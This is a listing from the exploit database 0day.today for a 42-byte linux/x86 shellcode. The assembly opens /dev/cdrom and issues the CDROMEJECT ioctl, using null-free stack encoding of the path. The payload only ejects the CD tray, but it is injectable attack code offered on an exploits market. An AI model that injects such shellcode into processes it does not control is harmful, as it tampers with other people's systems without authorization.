[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

linux/x86 eject /dev/cdrom 42 bytes

Author
thegibson
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10004
Category
shellcode
Date add
08-01-2010
Platform
linux/x86
===================================
linux/x86 eject /dev/cdrom 42 bytes
===================================

; linux/x86 eject /dev/cdrom 42 bytes
 
section .text
    global _start
 
_start:
    ; open("/dev/cdrom", O_RDONLY | O_NONBLOCK);
    mov al, 5
    cdq
    push edx
    push word 0x6d6f
    push dword 0x7264632f
    push dword 0x7665642f
    mov ebx, esp
    mov cx, 0xfff
    sub cx, 0x7ff
    int 0x80
 
    ; ioctl(fd, CDROMEJECT, 0);
    mov ebx, eax
    mov al, 54
    mov cx, 0x5309
    cdq
    int 0x80


#  0day.today [2024-11-16]  #